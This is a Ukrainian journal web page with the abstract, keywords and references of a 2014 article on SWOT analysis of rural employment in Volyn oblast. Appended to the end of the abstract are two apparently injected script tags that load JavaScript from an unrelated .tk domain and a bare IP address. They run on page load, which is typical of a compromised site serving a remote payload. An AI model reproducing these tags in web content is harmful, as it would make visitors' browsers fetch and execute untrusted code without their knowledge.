ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 631.304
Розвиток сільських територій і соціальна сфера села

SWOT-аналіз як дієвий інструмент процесу формування продуктивної зайнятості сільського населення / Ратошнюк Т. М. // Економіка АПК. - 2014. - № 1 - С. 57

Проаналізовано сучасний стан зайнятості сільського населення Волинської області за економічною активністю: визначено динаміку, склад і структуру зайнятих та безробітних у регіоні. Здійснено науково-теоретичне й практичне обґрунтування доцільності використання методів стратегічного управління у процесі формування зайнятості на селі. Розроблено алгоритм SWOT-аналізу трудової діяльності сільського населення та на його основі визначено стратегічні напрями забезпечення продуктивної зайнятості сільських жителів. SWOТ-аналіз як інструмент стратегічного управління, вивчаючи зовнішнє середовище, зосереджує увагу на з’ясуванні загроз і можливостей, передбачає виявлення сильних та слабких сторін із подальшим встановленням ланцюгів зв’язку між ними, є основою для формування продуктивної зайнятості сільського населення. Проведене дослідження рівня зайнятості сільського населення Волинської області доводить про необхідність поліпшення умов і якості життя мешканців сільської місцевості; досягнення відтворення людського капіталу; зниження рівня сільського безробіття й викоренення нерегламентованої тіньової зайнятості тощо. Табл.: 3. Рис.: 2. Бібліогр.: 10.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: аграрний сектор, економічна активність, трудова діяльність, сільське населення, зайнятість, SWOT-аналіз

Список використаних джерел

  1. Українська модель аграрного розвитку та її соціоекономічна переорієнтація: наук. доп. / [О.М. Бородіна, В.М. Геєць, А.О. Гуторов та ін.]; за ред. В.М. Гейця, О.М. Бородіної, І.В. Прокопи; НАН України, Ін-т екон. і прогнозув. – К., 2012. – 56 с.
  2. Шершньова З.Є. Стратегічне управління: підруч. / З.Є. Шершньова.– [2-ге вид., перероб. і доп.].– К.: КНЕУ, 2004. – 700 с.
  3. Статистичний щорічник Волинь – 2012; за ред. В.Ю. Науменка. – Луцьк: Головне управління статистики у Волинській області, 2013. – 522 с.
  4. Прокопа І.В. Зайнятість сільського населення в Україні: територіальна диференціація / І.В. Прокопа, О.Л. Попова, М.Г. Бетлій // Економіка і прогнозування: наук.-аналіт. журнал. – 2007. – №3. – С. 56-74.
  5. Проблеми та перспективи розвитку сільських територій України (на прикладі Карпатського регіону): наук.-аналіт. доп. / [В.В. Борщевський, Х.М. Притула, В.Є. Крупін, І. М. Куліш]; НАН України. Інститут регіональних досліджень. – Львів, 2011. – 60 с.
  6. Економічна діагностика: навч. посіб. / О.М. Яценко, А.О. Соколова, Є.І. Ходаківський, В.І. Ткачук. – Житомир: ЖНАЕУ, 2010. – 464 с.
  7. Ansoff A. The Secrets of Strategic Management: The Ansoffian Approach Paperback. – February 23, 2006.
  8. Drucker  Peter. Managing the Nonprofit Organization: Practices and Principles (New York: Harper Collins). – 1990.
  9. Porter, M.E. The Five Competitive Forces That Shape Strategy, Harvard Business Review, January 2008, p. 79–93.
  10. Thompson A., Strickland Jr. A. III. Strategic Management: Concepts and Cases. – 12th ed. – Boston, Mass.: McGraw-hill/Irvin, 2001. – 666 p.
Читати статтю: 14_01_57-64.pdf